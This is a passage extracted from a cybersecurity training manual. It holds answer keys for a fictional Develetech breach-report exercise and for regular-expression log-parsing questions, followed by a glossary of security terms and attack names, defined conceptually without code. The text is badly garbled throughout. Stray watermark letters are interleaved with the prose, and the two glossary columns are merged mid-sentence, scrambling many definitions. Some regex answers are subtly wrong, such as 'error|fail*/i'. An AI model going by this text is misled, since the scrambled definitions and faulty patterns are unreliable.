the investigation, the focus of the investigation, the specific people and systems you
investigated, what you found, and how it all comes together. For the data breach incident,
e
you may choose to begin the report by stating that you were authorized to perform the
investigation by the CISO of Develetech, and that you were tasked with finding out what
ut
data was breached and who was responsible. The assets that the team investigated
were: Pat's workstation, the system and anti-malware logs on that workstation, the
research and development server, the system and network logs of that server, the
ib
network logs of various other devices, the people who were indirectly affected by the
incident (Charles and the help desk employee), one of the victims (Pat), and the primary
suspect (Rupert). What you found is evidence of a failed remote login attempt, evidence
tr
of a remote connection from inside the network using certain credentials (Pat's), network
logs supporting these connection attempts, host and anti-malware logs indicating that
is
sensitive files were transferred off the research and development server, the USB drive
with those files on them, and more. You could then likely end with a way to pull it all
together, constructing a single narrative of events as implied by the evidence you found.
D
This narrative should go step-by-step and explain how Rupert breached the server, why
he did so, and what he might have done with this stolen data.
2.
this initiative? or
If Develetech decides to press charges, what can you do to help
A: Answers may vary, but a forensic investigator should research the laws that govern the
e
organization, including specifically which laws may have been broken as a result of the
data breach. If legal counsel advises the company to press charges, you can further tailor
at
your report to speak to the applicable laws. For example, some laws will place greater
value on certain types of evidence, so you'll want to make sure the report focuses on that
evidence so that it clearly illustrates how the law was broken.
lic
3. How would you suggest collaborating with this non-technical

audience?
up
A: Answers will vary. It's important that the liaison clearly understands what law
enforcement officials expect of them, and likewise, communicates what they expect of the
officials. This will enable you to exchange information and evidence without issue. Also,
D
you shouldn't expect that local law enforcement will provide a comprehensive level of
assistance to your investigation; you may need to do most of the remaining work
internally. Still, some agencies (particularly federal ones) may have tools at their disposal
that you do not. You should take advantage of these tools wherever possible.
ot
N
ACTIVITY B-1: Parsing Log Files with Regular

Expressions
o
D
1. How would you write a regular expression to capture all possible

ZIP codes?
A: The simplest way to write this expression is \d{5}—this searches for any combination
of five digits.
Solutions
2. How would you write a regular expression to capture all of these extended
ZIP codes?
A: The expression \d{5}-\d{4} does the job.
3. In the ZIP code example, what if you wanted to capture all possible five-digit
ZIP codes or any extended ZIP codes?
A: You can use the "OR" logical operator to do this. The expression could be something like \d{5}-
\d{4}|\d{5}—this basically combines the two previous expressions using the pipe symbol to indicate
e
an alternative.
ut
4. In the following space, write a regular expression that searches for these
messages, regardless of capitalization.
ib
A: A basic example is error|fail*/i
What do all email addresses share in common? What, if anything, can remain
tr
5.
static in this expression? What characters will you need to escape? Does the
is
expression need to be perfect?
A: All email addresses are in the basic format localname@domain.tld. The length and specific character
D
requirements may vary; for example, top-level domains are generally not longer than four characters,
the entire address is usually not allowed to be over 255 characters, and some systems do not allow
certain special characters. Still, the @ symbol and the period are always going to be in an email
or
address. Beyond this, nothing is really static, as you're trying to search for all possible addresses. The
only real character you need to escape is the period before the top-level domain. The expression
doesn't need to be perfect, and you may not even need to pay attention to character limits in the local
name and domain sections.
e
6. In the following space, write out your regular expression to capture everything
at
in an email address format.

A: A basic example is .+@.+\.[a-z]{2,4}—this works for most email addresses, but may not
lic
include some of the latest top-level domain suffixes.
7. Write a regular expression that will capture all possible IP addresses.

up
Remember, your expressions don't need to be perfect to be functional.

A: A basic example is (\d{1,3}\.){3}\d{1,3}—though this example would allow illegal IP
addresses (greater than 255 for an octet, for example). This may be good enough for your purposes,
however, as you are unlikely to encounter invalid IP addresses in your logs.
D
8. When would you use regular expressions rather than normal searches in
logs?
ot
A: Answers will vary, but may include searching for any string that you know only part of; version
numbers; timestamps; IP addresses; port numbers; user names; and more.
N
o
D
Solutions
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

Glossary
e
ut
ib
AAR APT
(after-action report) A document that (advanced persistent threat) An attack that
tr
includes an analysis of security events and remains covert over a long period of time.
incidents that can provide insight into how
is
to enhance security for the future. armored virus
A virus that obscures its true location in a
D
account management system by misleading the anti-malware
A common term used to refer to the system into thinking it resides elsewhere.
processes, functions, and policies used to
organization. or
effectively manage user accounts within an ARO
(annual rate of occurrence) How many
times per year a particular loss is expected
administrative controls
e
to occur.
Security measures implemented to monitor
at
the adherence to organizational policies ARP

and procedures. (Address Resolution Protocol) The
lic
mechanism by which individual hardware

adware MAC addresses are matched to IP
Software that automatically displays or addresses on a network.
up
downloads unsolicited advertisements

when it is used. ARP poisoning
An attack in which an attacker redirects an
ALE IP address to a MAC address that was not
D
(annual loss expectancy) The total cost of a its intended destination.

risk to an organization on an annual basis.
ARP spoofing
ot
anomaly analysis See ARP poisoning.

The process of defining an expected
ATT&CK
N
outcome or pattern to events, and then

identifying any events that do not follow (Adversarial Tactics, Techniques, and
these patterns. Common Knowledge) A resource for
o
listing and explaining specific post-attack

anti-forensics techniques. Maintained by the MITRE
D
The process by which an attacker impedes Corporation.

a forensic investigation.

attack surface bastion host

All of the various vulnerable points in a A network host that connects a trusted
system through which an attacker can security zone to a trusted security zone or
launch an attack. an untrusted zone to a trusted zone and
provisions specific resources from within
attack tree the trusted zone to external users or
A graphical representation of threat devices requesting those resources.
modeling in which an attacker's goal is
positioned in relation to the attack vectors BCP
e
used to achieve that goal, and possibly any (business continuity plan) A plan that
ut
mitigation techniques the security details exactly how an organization ought
professional can employ to prevent or stop to continue day-to-day operations in the
the attack. event of a disaster that causes at least one
ib
critical operation to fail.
attack vector
tr
The method or path that an attack takes. beaconing
The process by which a bot in a botnet
is
auditing sends its status (a "heartbeat") to a
A detailed and specific evaluation of a command and control server to indicate
D
process, procedure, organization, job that it is "alive."
function, or system, in which results are
gathered and reported to ensure that the behavioral analysis
legal responsibilities.
or
target of the audit is in compliance with
the organization's policies, regulations, and
The process of identifying the way in
which an entity acts, and then reviewing
future behavior to see if it deviates from
the norm.
e
authorization
at
The process of determining what rights BIA

and privileges a particular entity has, (business impact analysis) Identifies
usually after the system has authenticated present organizational risks and determines
lic
them. the impact to ongoing, business-critical

operations and processes if such risks
availability actually occur.
up
The fundamental security goal of ensuring

that services function correctly and big data
consistently without outages or denial of Data collections that are so large and
D
service. complex that they are difficult for

traditional database tools to manage.
backdoor
ot
A method by which an attacker bypasses bit-stream imaging

authentication to gain access to a system. The forensic process of capturing a bit-for-
N
bit copy of a piece of media.

baiting
A form of social engineering in which an black box
o
attacker leaves infected physical media in A pen testing approach that simulates an
an area where a victim finds it and then outside attacker that knows little to
D
inserts it into a computer. nothing about the target. The pen tester
must do their own reconnaissance.
Bash
A command shell and scripting language black hole
for Unix-like systems. A component of network architecture that
drops any packets it receives, without
alerting the source.
Glossary
blacklisting CBEST
The process of blocking specific systems, A penetration testing framework created by
software, services, and more, from using a CREST that is geared toward the UK financial
resource. Anything not on the list is allowed. sector.
Bluetooth CDM
A wireless technology that facilitates short- (Continuous Diagnostics and Mitigation) A
range wireless voice and data communications program created by the Department of
between devices. Homeland Security to identify threats,
e
prioritize those threats in terms of the risks
ut
bot they pose, and then give security personnel the
A machine that has been infected as part of a ability to triage these threats, all on an ongoing
botnet. basis.
ib
botnet CESG
tr
A set of computers that has been infected by a (Communications–Electronics Security Group)
control program that enables attackers to An organization within the UK government
is
collectively exploit those computers to mount that assists other government entities with their
attacks. information security.
D
BPA CFAA
(business partnership agreement) Defines how (Computer Fraud and Abuse Act) A U.S. law
a partnership between business entities will be
conducted, and what exactly is expected of
each entity in terms of services, finances, and
security.
or
that prohibits users from accessing computer
systems without authorization.
chain of custody
e
The record of evidence handling from
at
buffer overflow collection to presentation in court to disposal.

An attack in which data goes past the boundary
of the destination buffer and begins to corrupt change management
lic
adjacent memory. The process through which changes to the

configuration of information systems are
BYOD monitored and controlled, as part of the
up
(bring your own device) A phenomenon in organization's overall configuration

which employees use their personal mobile management efforts.
devices in the workplace.
D
CHECK
CAM table A framework established by the UK security
(content-addressable memory) A table used by group CESG to ensure that government
ot
switches to map MAC addresses to ports to agencies can identify vulnerabilities to their
forward packets to specific interfaces. confidentiality, integrity, and availability
N
through testing of networks and other systems.

CAN-SPAM
(Controlling the Assault of Non-Solicited CIA triad
o
Pornography and Marketing) A U.S federal law (confidentiality, integrity, availability) The three
that outlines various rules for the sending of principles of security control and management.
D
commercial email messages. Also known as the information security triad.
CAPEC cipher
(Common Attack Pattern Enumeration and An algorithm used to encrypt or decrypt data.
Classification) A database that classifies Algorithms can be simple mechanical
specific attack patterns. Maintained by the substitutions, but in electronic cryptography,
MITRE Corporation.
Glossary
they are generally complex mathematical compensating control

functions. A security measure that takes on risk mitigation
when a primary control fails or cannot
CIS completely meet expectations.
(Center for Internet Security) A non-profit
organization that provides security resources Computer Misuse Act
and information to various industries. A UK law introduced in 1990 that defines
three computer-assisted criminal offenses.
CIS Controls
e
A list of various cybersecurity control confidentiality
ut
categories and action items compiled by the The fundamental security goal of keeping
Center for Internet Security (CIS). information and communications private and
protecting them from unauthorized access.
ib
clickjacking
An attack in which an attacker tricks a client configuration management
tr
into clicking a web page link that is different The process through which an organization's
from where they had intended to go. information systems components are kept in a
is
controlled state that meets the organization's
closed source intelligence requirements, including those for security and
Information that is obtained through private
D
compliance.
sources.
continuous monitoring and
CMMC
program for certifying U.S. government

contractors as having met cybersecurity
or
(Cybersecurity Model Maturity Certification) A
improvement
The technique of constantly evaluating an
environment for changes so that new risks may
be more quickly detected and business
e
standards set forth by the Department of operations improved upon.
at
Defense (DoD) and an accreditation board of

security professionals. cookie hijacking
An attack in which an attacker intercepts a
lic
COBIT cookie to inject malicious code that they can

(Control Objectives for Information and use to take control of the session.
Related Technology) An IT governance
up
framework developed by ISACA that cookie poisoning

incorporates elements of risk management and An attack in which an attacker modifies the
mitigation. contents of a cookie after it has been generated
D
and sent by the web service to the client's

code injection browser so that the newly modified cookie can
See command injection. be used to exploit vulnerabilities in a web app.
ot
coercive parsing COPPA

An attack in which an attacker maliciously
N
(Children's Online Privacy Protection Act) A

modifies the way in which SOAP parses XML- U.S. federal law that is meant to protect the
based requests. privacy of personal information about children
o
under the age of 13.

command and control
D
An infrastructure of computers with which correlation analysis

attackers direct, distribute, and control malware The process of identifying dependent
over botnets. relationships between different forms of
information that indicate some larger pattern
command injection of behavior.
An attack in which an attacker supplies an
application or web page with malicious code.
Glossary
countermeasure Cyber Kill Chain

An action taken to defend against the effects of A model developed by Lockheed Martin that
some unwanted event or incident. describes the anatomy of an information
security threat.
CREST
(Council for Registered Ethical Security cyberlaw
Testers) A non-profit UK-based organization Law that governs the behavior of individuals
that specializes in penetration testing services. and groups in the use of computers, the
Internet, and other information technology
e
cryptography domains.
ut
The science of altering data to make it
unintelligible to unauthorized parties. cyberterrorist
An attacker who uses computers to damage
ib
CSA other computer systems and generally spread
(Cloud Security Alliance) A coalition of several alarm.
tr
member organizations that seek to promote
best practices for the security of cloud data analytics
is
computing. The process of applying analytical techniques
to data in order to reveal patterns that can
CSIRT
D
inform decision making.
(cybersecurity incident response team) A
collection of individuals who are trained in the data exfiltration
proper collection and preservation techniques
for investigating security incidents.
CSM
to another.or
The malicious transfer of data from one system
Data Protection Act

e
(continuous security monitoring) The practice A UK law that regulates the processing of
at
of conducting ongoing monitoring of the personal information.

security of the organization's networks,
information, and systems, and responding data remanence
lic
appropriately as situations change. See data remnants.
CSRF data remnants

up
(cross-site request forgery) See XSRF. Leftover information on a storage medium

even after basic attempts have been made to
CVE remove that data.
D
(Common Vulnerabilities and Exposures) A

dictionary of vulnerabilities maintained by the DDoS attack
MITRE Corporation. (distributed denial of service) A type of DoS
ot
attack that uses multiple computers on

CVSS disparate networks to launch the attack from
(Common Vulnerability Scoring System) A risk many simultaneous sources.
N
management approach to quantifying

vulnerability data and then taking into account de-perimeterization
The process of shifting, reducing, or removing
o
the severity of harm to different types of

systems or information. some of the organization's boundaries to
D
facilitate interactions with the world outside of

CWE its domain.
(Common Weakness Enumeration) A database
of software-related vulnerabilities. Maintained deep learning
by the MITRE Corporation. A type of machine learning that makes
complex decisions using multiple layers of
information.
Glossary
defense in depth DNS poisoning

A security strategy that positions the layers of An attack in which an attacker modifies a DNS
network security as network traffic roadblocks; server's cache to return a fraudulent IP address
each layer is intended to slow an attack's to users.
progress, rather than eliminating it outright.
DOM-based attack
degaussing (Document Object Model) A cross-site
The process of rendering a magnetic storage scripting (XSS) attack in which an attacker
drive inoperable and its data unrecoverable by takes advantage of a web app's client-side
e
eliminating the drive's magnetic charge. implementation of JavaScript to execute their
ut
attack solely on the client.
DES
(Data Encryption Standard) A block cipher DoS attack
ib
symmetric encryption algorithm that encrypts (denial of service attack) A type of attack in
data in 64-bit blocks using a 56-bit key with 8 which an attacker attempts to disrupt or
tr
bits used for parity. disable systems that provide network or
application services by various means.
is
DHCP spoofing
(Dynamic Host Configuration Protocol) An doxing
D
attack in which an attacker responds to a client The practice of publishing an individual's
requesting address assignment from a DHCP personally identifiable information online.
server.
digital signature or
A message digest that has been encrypted again
with a user's private key.
drone
See bot.
DRP
e
(disaster recovery plan) A policy that defines
at
directory traversal how people and resources will be protected in

An attack in which an attacker accesses files a disaster, and how the organization will
from a location that the attacker is not recover from the disaster.
lic
authorized to access.
dumpster diving
disassembler A human-based attack where the goal is to
up
Reverse engineering software that converts reclaim important information by inspecting

machine language code into assembly language the contents of trash containers.
code.
D
EDR
DNS amplification attack (endpoint detection and response) A system
(Domain Name System) A type of reflected that uses various techniques to monitor and
ot
attack in which a small query to a DNS server analyze data collected from network hosts, and
returns a reply up to eight times larger and responds to protect those hosts from threats.
N
makes it easier for the attacker to flood the

target. enumeration
The last step of reconnaissance when the
o
DNS filtering attacker tries to get a list of resources on the

The process of restricting the domains users network, host, or system as a whole to identify
D
can access based on pre-configured blacklists potential targets for further attack.
or whitelists.
ETL
DNS hijacking (extract, transform, load) The process of
An attack in which an attacker modifies a combining data from multiple sources,
computer's DNS configurations to point to a preparing the data, and loading the resulting
malicious DNS server. data into a destination format.
Glossary
evil twins GDPR

Access points on a network that fool users into (General Data Protection Regulation) A
believing they are legitimate. European Union regulation that regulates the
export of EU citizens' personal data for entities
file carving that collect or process this data, even if said
The process of extracting data from a entities are not based in the EU.
computer when that data has no associated file
system metadata. geo-velocity
The practice of validating whether or not
e
file inclusion certain account behavior is possible given the
ut
An attack in which an attacker adds a file to the speed of current travel technology.
running process of a web app or website.
GHDB
ib
fingerprinting (Google Hacking Database) A collection of
The technique of determining the type of web-based exploits that can be launched
tr
operating system and services a target uses by through the Google search engine.
studying the types of packets and the
is
characteristics of these packets during a GLBA
communications session. (Gramm–Leach–Bliley Act) A U.S. federal law
D
enacted in 1999 that deregulated banks, but
firewall also instituted requirements that help protect
Any software or hardware device that protects the privacy of an individual's financial
a system or network by blocking unwanted
network traffic.
FISMA
or
information that is held by financial
institutions.
golden ticket
e
(Federal Information Security Management A Kerberos authentication ticket that can grant
at
Act) A U.S. law enacted in 2002 and amended other tickets in an Active Directory
in 2014 that includes several provisions that environment.
require federal organizations to more clearly
lic
document and assess information systems grey box

security. A pen test approach that simulates an inside
attacker that knows something about a target,
up
flash crowd but not everything. The pen tester must do

When used in regard to network traffic, this additional reconnaissance beyond what has
refers to a situation in which the network or been provided to them.
D
host suddenly receives an unusually large

amount of traffic. hacktivist
An attacker that is motivated by a social issue
ot
footprinting or political cause.

The phase in an attack or penetration test in
hash
N
which the attacker or tester gathers

information about the target before attacking The value that results from a hashing
it. operation.
o
GAPP hashing
D
(Generally Accepted Privacy Principles) A A process or function that transforms plaintext

framework that provides guidance to chartered input into an indecipherable fixed-length
accountants (CA) and certified public output and ensures that this process cannot be
accountants (CPA) in maintaining the security feasibly reversed.
of personally identifiable information (PII).
Glossary
heuristic analysis credentials to a system, network, or an

The process of identifying the way in which an organization.
entity acts in a specific environment, and
making decisions about the nature of the entity IDS
based on this. (intrusion detection system) A system that
scans, audits, and monitors the security
HIPAA infrastructure for signs of attacks in progress.
(Health Insurance Portability and
Accountability Act) A law enacted in 1996 to impersonation
e
establish several rules and regulations regarding A human-based attack where an attacker
ut
healthcare in the United States. pretends to be someone they are not.
hoax incident response
ib
An email-based or web-based attack that tricks The process by which an organization reacts to
the user into performing undesired actions, and reports security breaches within an
tr
such as deleting important system files in an acceptable time period.
attempt to remove a virus, or sending money
is
or important information via email or online inherent risk
forms. Risk that an event will pose if no controls are
put in place to mitigate it.
D
honeypot
The practice of tricking an attacker into input validation
or
accessing an isolated network or system so that
the attacker may be monitored and eventually
dealt with.
Any technique used to ensure that the data
entered into a field or variable in an application
is handled appropriately by that application.
e
horizontal privilege escalation integrity
at
When a user accesses or modifies specific The fundamental security goal of ensuring that
resources that they are not entitled to. electronic data is not altered or tampered with.
lic
IA interference
(interoperability agreement) General term for Radio waves disrupting wireless signals.
any document that outlines a business
up
IOC
partnership or collaboration in which all
(indicator of compromise) A sign that an asset
entities exchange some resources while
or network has been attacked or is currently
working together.
D
under attack.
IAM
IPS
(identity and access management) The
ot
(intrusion prevention system) A system that

information security process of protecting how
scans, audits, and monitors the security
users and devices are identified in a system,
infrastructure for signs of attacks in progress,
N
and how they are able to access resources

and actively blocks attacks.
based on these identities.
IRC
o
ICMP flood
(Internet Relay Chat) A group communications
(Internet Control Message Protocol) An attack
D
protocol that enables users to chat, send

based on sending high volumes of ICMP ping
private messages, and share files.
packets to a target.
ISA
identity theft
(interconnection security agreement)
The stealing of an individual's personal
Document geared toward the information
information, including their authorized access
systems of partnered entities to ensure that the
Glossary
use of inter-organizational technology meets a Kali Linux

certain security standard for CIA. A free suite of open source tools built into a
custom Linux distribution, maintained by
ISA/IEC-62443 Offensive Security.
A series of standards that provides guidance
and best practices for implementing security in lateral movement
industrial control systems (ICSs). The process by which an attacker is able to
move from one part of a computing
ISACA environment to another.
e
An organization that promotes information
ut
technology and cybersecurity through least privilege
frameworks like COBIT and certification The principle that states that users and
programs like Certified Information Security software should only have the minimal level of
ib
Manager (CISM). access that is necessary for them to perform
the duties required of them.
tr
ISF
(Information Security Forum) An independent, levels of authority
is
not-for-profit organization that looks at key A hierarchy that dictates what actions an
issues in security and risk management, and individual can take, and what responsibilities
D
develops best practices that meet the needs of they have.
its members.
LFI
ISO
(International Organization for
Standardization) An organization with global
reach that promotes standards for many
or
(local file inclusion) An attack in which an
attacker executes a script to run a file already
existing on a web server.
e
different industries. live VM migration
at
The act of moving a virtual machine (VM)

ISO/IEC 27000 series from one physical host to another with no
A large family of IT security standards impact on the VM's availability, which can be
lic
developed. exploited by attackers.
ISO/IEC 29100 LLR

up
A framework that outlines various concerns (lessons learned report) See AAR.
and solutions regarding data privacy.
log auditing
D
ITAF The process of evaluating an organization's

(Information Technology Assurance logging architecture to determine if it is
Framework) A framework developed by meeting a set of predefined criteria.
ot
ISACA that provides guidance for IT

assurance auditing. log enrichment
The process of making logs more readable and
N
job rotation increasing their usefulness to address some

The principle that establishes that no one challenges in processing their information.
o
person stays in a vital job role for too long a

time period. logic bomb
D
A malicious piece of code that sits dormant on

jump box a target computer until it is triggered by a
A hardened server that acts as a bridge specific event, such as a specific date.
between two security zones or trusted
networks. logical controls
See technical controls.
Glossary
long tail analysis message digest

In cybersecurity analysis, the technique of See hash.
culling low-frequency events in order to
identify events that are more likely to be MITRE Corporation
anomalous. A non-profit organization that manages
research and development centers that receive
machine learning federal funding from entities like the DoD and
An AI discipline in which a machine is able to NIST.
gradually improve its estimative capabilities
e
without being given explicit instructions. MOU
ut
(memorandum of understanding ) An informal
malvertisement business agreement that is usually not legally
Malicious code delivered through online binding and typically does not involve the
ib
advertisements. exchange of money.
tr
malware MSA
Malicious software. (master service agreement) A document that
is
lays the groundwork for any future business
man-in-the-middle attack documents that two parties may agree to.
A form of eavesdropping where the attacker
D
makes an independent connection between NAC
two victims and accesses or disrupts sensitive (network access control) The collected
information.
management controls
See administrative controls.
or protocols, policies, and hardware that govern
access on device network interconnections.
NBAD
e
(network behavior anomaly detection) A
mandatory vacation
at
security monitoring tool that monitors network

The principle that states when and how long an packets for anomalous behavior based on
employee must take time off from work so that known signatures.
lic
their activities may be subjected to a security

review. NDA
(non-disclosure agreement) An agreement
up
masked attack between entities stipulating that they will not

A type of brute-force password cracking that share confidential information, knowledge, or
uses placeholders for predictable values based materials with unauthorized third parties.
D
on typical user behavior when it comes to

designing passwords. NERC 1300
A standard published by the North American
ot
MDM Electric Reliability Corporation (NERC) for

(mobile device management) The process of the security of bulk electric systems (BESs).
tracking, controlling, and securing the
N
organization's mobile infrastructure. NetFlow

A protocol included in many network devices
memory leak
o
that enables network administrators to monitor

The result of an application allocating memory the flow of network traffic across these
D
and then not cleaning that memory up by devices.

freeing it when it is no longer required for
usage by the application. NGFW
(next-generation firewall) A firewall that goes
memory resident beyond traditional firewall functionality by
The characteristic of code being in memory operating at the application layer and protocol
even after its application has terminated. stack.
Glossary
NIST open source intelligence

(National Institute of Standards and Information that is obtained through public
Technology) A U.S. government agency that sources.
promotes a wide range of standards, including
those that focus on cybersecurity. operational controls
See administrative controls.
NIST Cybersecurity Framework
A unified framework that provides guidance to order of volatility
organizations for managing risk in their The order in which data must be collected or
e
environments. preserved after an incident before the data
ut
deteriorates, is erased, or is overwritten.
NIST Privacy Framework
A framework that provides guidance to OSSTMM
ib
organizations for managing risks to data (Open Source Security Testing Methodology
privacy. Manual) A manual developed by the Institute
tr
for Security and Open Methodologies
NIST SP 800-61 (ISECOM) that outlines every area of an
is
(NIST Special Publication 800-61) A set of organization that needs testing, as well as goes
guidance and recommendations during the into details about how to conduct the relevant
D
incident response process. tests.
non-repudiation OVAL
The security goal of ensuring that the party
that sent a transmission or created data
remains associated with that data and cannot
deny sending or creating that data.
or
(Open Vulnerability and Assessment
Language) An open standard that promotes
communication about cybersecurity
information. Maintained by the MITRE
e
Corporation.
at
normalization
In the context of network security intelligence OWASP
collection, the process of converting security- (Open Web Application Security Project) A
lic
related data from network logs, system logs, community effort that provides free access to a
application APIs, and other sources into number of secure programming resources and
common formats that can easily be analyzed. best practices.
up
NTP reflected attack packet crafting

(Network Time Protocol) An attack in which A method of manually generating packets
D
an attacker sends a small query to an NTP (instead of modifying existing network traffic)
server, which then returns a much larger to test the behavior of network devices,
response that includes data from the last 600 enabling a hacker to enumerate firewall or
ot
machines the server has communicated with. intrusion detection rules that are in place.
NVD packet trace analysis

N
(National Vulnerability Database) A superset The act of examining data packet

of the CVE database maintained by NIST. communications to reveal insights without
o
digging into packet content, such as when the

OLA packet contents are encrypted.
D
(operating-level agreement) An agreement that

identifies and defines the working relationships parameterized query
between groups or divisions of an organization A defense against SQL injection attacks that
as they share responsibilities toward fulfilling incorporates placeholders for some of a query's
one or more SLAs with their internal or parameters.
external customers.
Glossary
pass the hash physical controls

An offline password attack technique that Measures that restrict, detect, and monitor
takes an account's cached credentials when access to specific physical areas or assets.
they are logged in to an SSO system, and steals
those cached credentials to use on the piggybacking
attacker's own system. Similar to tailgating, except the legitimate
employee is aware that someone is following
password cracking behind them.
The recovery of secret passwords from data
e
stored or transmitted by a computer. ping flood
ut
See ICMP flood.
password sniffing
The practice of monitoring for password data PIPEDA
ib
in network transmissions. (Personal Information Protection and
Electronic Documents Act) A Canadian act,
tr
patch management applying to all organizations, that regulates the
The process of collecting, evaluating, testing, collection, use, and disclosure of personal
is
and deploying fixes to computer software. information and brings Canada into
compliance with European Union privacy
PCI DSS
D
regulations.
(Payment Card Industry Data Security
Standard) A proprietary standard that specifies pivoting
controls on cardholder data and reduce

fraudulent use of accounts.
or
how organizations should handle information
security for major card brands to increase
An attack in which an attacker uses a
compromised host (the pivot) as a platform
from which to spread an attack to other points
in the network.
e
at
penetration test polymorphic virus

A test that uses active tools and security A virus that changes its code when it infects a
utilities to evaluate security by executing an new file, making it very difficult for anti-
lic
authorized attack on a system. malware to keep up.
permanent DoS attack port forwarding

up
See phlashing. An attack in which an attacker uses a host as a

pivot and is able to access one of its open
pharming TCP/IP ports. The attacker then forwards
D
An attack in which a request for a website, traffic from this port to a host's port on a
typically an e-commerce site, is redirected to a different subnet using pivoting methods.
similar-looking, but fake, website.
ot
port scanner
phishing A device or application that scans a network to
A type of social engineering attack in which the
N
identify what devices are reachable (alive), what

attacker sends messages from a spoofed ports on these devices are active, and what
source, such as a bank, to try to elicit private protocols these active ports use to
o
information from the victim. Phishing usually communicate.

refers to such messages that use email as the
D
delivery medium. prepared statement

See parameterized query.
phlashing
An attack in which an attacker targets the private key
actual hardware of a system to prevent the During asymmetric encryption, this key is kept
victim from easily recovering from a DoS. secret by one party and never shared. The
Glossary
private key in a pair can decrypt data encoded ransomware

with the corresponding public key. Malicious code that restricts the victim's access
to their computer or the data on it. The
privilege elevation attacker then demands a ransom be paid under
See vertical privilege escalation. threat of keeping the restriction, destroying the
information they have locked down, or
privilege escalation exposing the information publicly.
The technique of obtaining access to additional
resources or functionality that an entity is reflected attack
e
normally not allowed access to. A cross-site scripting (XSS) attack in which an
ut
attacker crafts a malicious form or other
program packer request to be sent to a legitimate web server.
A partly compressed executable that also The victim selects the malicious request and
ib
includes decompression code that will the script is sent to the server and reflected off
decompress the program before executing it. it onto the victim's browser.
tr
PsExec reflected DoS attack
is
A Windows-based remote access service that An attack in which a forged source IP address
doesn't require setup on the host being (the target) is used when sending requests to a
accessed remotely.
D
large number of computers. This causes those
systems to send a reply to the target system,
PTES
causing a DoS condition.
(Penetration Testing Execution Standard) A
standard established in 2009 that covers seven
areas of penetration testing and includes an
accompanying technical guide.
or
regular expression
A group of characters that describe how to
execute a specific search pattern on a given
e
text.
public key
at
During asymmetric encryption, this key is residual risk

given to anyone and can be used to encrypt Risk that remains even after controls are put
lic
data. into place.

qualitative analysis resource exhaustion
up
A risk analysis method that uses descriptions A type of DoS vulnerability that occurs when
and words to measure the likelihood and an application does not properly restrict access
impact of risk. to requested or needed resources.
D
quantitative analysis reverse engineering

A risk analysis method that is based completely The process of analyzing the structure of
ot
on numeric values. hardware or software to reveal more about

how it functions.
quid pro quo
N
A social engineering attack in which an attacker RFC 2196

promises to provide a gift or favor to a victim (Requests for Comments 2196) A publication
in exchange for useful information.
o
that provides guidance on securing sites that

have Internet-connected systems.
D
rainbow table
An offline password attack technique that uses RFI
sets of pre-computed passwords and their (remote file inclusion) An attack in which an
hashes stored in a file that dramatically reduce attacker executes a script to include an external
the time needed to crack a password. file in a running web app or website.
Glossary
risk acceptance rogue hardware

The response of determining that a risk is An unauthorized physical device attached to a
within the organization's appetite and no network or asset.
additional action is needed.
root cause analysis
risk analysis The process of attempting to determine the
The security process used for assessing risk catalyst of an incident.
damages that can affect an organization.
rootkit
e
risk avoidance Malicious code that is intended to take full or
ut
The response of eliminating the source of a partial control of a system at the lowest levels.
risk so that the risk is removed entirely.
salting
ib
risk exposure The act of adding a random value to the
The property that dictates how susceptible an plaintext input in a hashing operation to
tr
organization is to loss. defend against rainbow table attacks.
is
risk management sandboxing
The cyclical process of identifying, assessing, The practice of isolating an environment from
analyzing, and responding to risks. a larger system to guarantee that the
D
environment runs in a controlled, secure
risk mitigation fashion.
organization's risk appetite.
risk transference
or
The response of reducing risk to fit within an
sanitization
The process of thoroughly and completely
removing data from a storage medium so that
e
The response of moving the responsibility of the data cannot be recovered.
at
risk to another entity.

scanning
RMF An active phase of reconnaissance that
lic
(Risk Management Framework) A framework involves gathering information about a target.

developed by NIST that includes processes for
integrating information assurance and risk SCAP
up
management strategies into the systems (Security Content Automation Protocol) A

development lifecycle (SDLC). framework developed by NIST that automates
the vulnerability management process,
ROE
D
including identifying flaws in security

(rules of engagement) A definition of how a configurations.
pen test will be executed and what constraints
ot
will be in place. script kiddie

An inexperienced, unskilled attacker that
rogue access point typically uses tools or scripts created by others.
N
An unauthorized wireless access point (WAP)

on a corporate or private network that can SDEE
enable man-in-the-middle attacks and access to (Security Device Event Exchange) An alert
o
private information. format and transport protocol specification for

D
intrusion detection systems.

rogue account
An unauthorized or compromised account on SDL
a system. (Security Development Lifecycle) Microsoft's
security framework for application
development that supports dynamic
development processes.
Glossary
SDLC sinkhole
(systems development lifecycle) The practice of A network defense method of redirecting
designing and deploying technology systems outbound malicious traffic to an internal host
from initial planning all the way to end-of-life. so that it cannot escape outside the network.
SDN sinkhole attack

(software-defined networking) An approach to The act of creating a single node through
networking architecture that simplifies which all wireless traffic goes and then tricking
management by centralizing control over a the other nodes into redirecting their traffic.
e
network.
ut
site book
security intelligence A document or collection of documents that
The process through which data generated in take stock and inventory of all known assets,
ib
the ongoing use of information systems is configurations, protocols, and processes that
collected, processed, integrated, evaluated, make up a particular site.
tr
analyzed, and interpreted.
SLA
is
semi-quantitative analysis (service-level agreement) A business agreement
A risk analysis method that blends qualitative that outlines what services and support will be
D
and quantitative analysis methods together. provided to a client.
separation of duties Slashdot effect

The principle that establishes that no one
person should have too much power or
responsibility.
or
The phenomenon in which thousands of users
all flock to a website at once, overwhelm the
servers, and unintentionally cause a DoS
condition.
e
session fixation
at
An attack that forces a user to browse a SLE

website in the context of a known and valid (single loss expectancy) The financial loss
session. expected from a single adverse event.
lic
session hijacking SMiShing

An attack that exploits a computer during an A form of phishing that uses SMS text
up
active session to obtain unauthorized access to messages to trick a victim into revealing
data, services, and networks. information.
D
session prediction Smurf attack

An attack that focuses on identifying possible See ICMP flood.
weaknesses in the generation of session tokens
ot
that will enable an attacker to predict future SOA

valid session values. (statement of applicability) A document that
identifies the controls in place in an
N
shoulder surfing organization and explains their purpose.

A human-based attack where the goal is to
SOAP
o
look over the shoulder of an individual as they

enter password information or a PIN. (Simple Object Access Protocol) An XML-
D
based web services protocol that is used to

SIEM exchange messages.
(security information and event management)
A hardware and/or software solution that SOC
provides real-time or near-real-time analysis of (security operations center) The location where
security alerts generated by network hardware security professionals monitor and protect
and applications. critical information assets in an organization.
Glossary
social engineering SQL injection

The practice of deceiving people into giving An attack in which an attacker injects a
away access or confidential information to database query into the input data directed at a
unauthorized parties. server by accessing the client side of the
application.
SOX
(Sarbanes–Oxley Act) A U.S. law enacted in SSAE 18
2002 that dictates requirements for the storage (Statement on Standards for Attestation
and retention of documents relating to an Engagements no. 18) An auditing standard
e
